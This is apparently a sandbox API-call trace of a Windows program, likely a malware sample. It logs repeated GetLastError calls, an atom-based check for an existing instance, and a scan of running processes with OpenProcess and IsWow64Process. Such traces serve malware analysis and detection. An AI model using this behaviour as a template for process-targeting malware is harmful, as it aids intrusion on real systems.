	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.749] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.750] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.751] GetLastError () returned 0x5
	[0127.752] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.752] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0127.752] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.752] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0127.752] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0127.752] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0127.752] CloseHandle (hObject=0x2dc) returned 1
	[0127.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0127.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x2dc
	[0127.753] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.753] CloseHandle (hObject=0x2dc) returned 1
	[0127.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x2dc
	[0127.753] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.753] CloseHandle (hObject=0x2dc) returned 1
	[0127.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x2dc
	[0127.754] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.754] CloseHandle (hObject=0x2dc) returned 1
	[0127.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x2dc
	[0127.754] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.754] CloseHandle (hObject=0x2dc) returned 1
	[0127.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0127.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x2dc
	[0127.755] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.755] CloseHandle (hObject=0x2dc) returned 1
	[0127.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.787] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0127.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0127.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0127.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0127.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.788] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0127.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0127.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0127.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.789] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0127.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0127.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0127.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.790] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0127.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0127.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0127.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.791] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0127.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0127.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.792] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0127.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0127.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0127.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.793] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0127.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2dc
	[0127.794] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.794] CloseHandle (hObject=0x2dc) returned 1
	[0127.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0127.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.794] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0127.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2dc
	[0127.795] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.795] CloseHandle (hObject=0x2dc) returned 1
	[0127.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0127.795] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0127.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2dc
	[0127.796] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.796] CloseHandle (hObject=0x2dc) returned 1
	[0127.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2dc
	[0127.796] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.796] CloseHandle (hObject=0x2dc) returned 1
	[0127.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.796] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2dc
	[0127.796] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.796] CloseHandle (hObject=0x2dc) returned 1
	[0127.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2dc
	[0127.797] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.797] CloseHandle (hObject=0x2dc) returned 1
	[0127.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2dc
	[0127.797] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.797] CloseHandle (hObject=0x2dc) returned 1
	[0127.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2dc
	[0127.798] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.798] CloseHandle (hObject=0x2dc) returned 1
	[0127.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0127.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2dc
	[0127.798] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.798] CloseHandle (hObject=0x2dc) returned 1
	[0127.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2dc
	[0127.799] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.799] CloseHandle (hObject=0x2dc) returned 1
	[0127.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2dc
	[0127.800] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.800] CloseHandle (hObject=0x2dc) returned 1
	[0127.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2dc
	[0127.800] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.800] CloseHandle (hObject=0x2dc) returned 1
	[0127.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2dc
	[0127.800] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.800] CloseHandle (hObject=0x2dc) returned 1
	[0127.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0127.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2dc
	[0127.801] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.801] CloseHandle (hObject=0x2dc) returned 1
	[0127.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0127.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2dc
	[0127.801] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.801] CloseHandle (hObject=0x2dc) returned 1
	[0127.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2dc
	[0127.802] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.802] CloseHandle (hObject=0x2dc) returned 1
	[0127.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2dc
	[0127.802] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.802] CloseHandle (hObject=0x2dc) returned 1
	[0127.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2dc
	[0127.803] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.803] CloseHandle (hObject=0x2dc) returned 1
	[0127.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2dc
	[0127.803] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.803] CloseHandle (hObject=0x2dc) returned 1
